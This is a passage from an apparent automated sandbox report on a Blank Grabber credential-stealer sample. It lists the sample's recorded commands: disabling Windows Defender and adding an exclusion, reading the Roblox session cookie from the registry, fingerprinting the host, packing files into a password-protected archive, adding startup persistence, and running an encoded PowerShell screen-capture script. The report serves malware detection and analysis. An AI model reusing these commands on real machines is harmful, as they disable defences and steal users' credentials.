        • conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 5640 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 5224 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 3656 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 5388 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 1692 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 5768 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 1832 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 7320 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8004 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7624 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7776 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7880 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 4660 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7856 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7748 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7980 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7668 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6184 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 5800 cmdline: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 4144 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7480 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8124 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7384 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3856 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 1832 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5652 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 180 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3276 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4020 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 4140 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8004 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 8076 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI72722\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 9 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ahost.exe", ParentImage: C:\Users\user\Desktop\ahost.exe, ParentProcessId: 7328, ParentProcessName: ahost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'", ProcessId: 7384, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ahost.exe", ParentImage: C:\Users\user\Desktop\ahost.exe, ParentProcessId: 7328, ParentProcessName: ahost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7392, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ahost.exe", ParentImage: C:\Users\user\Desktop\ahost.exe, ParentProcessId: 7328, ParentProcessName: ahost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *", ProcessId: 6184, ProcessName: cmd.exe
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7384, StartAddress: 68232B0, TargetImage: C:\Windows\System32\cmd.exe, TargetProcessId: 7384
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\ahost.exe, ProcessId: 7328, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAI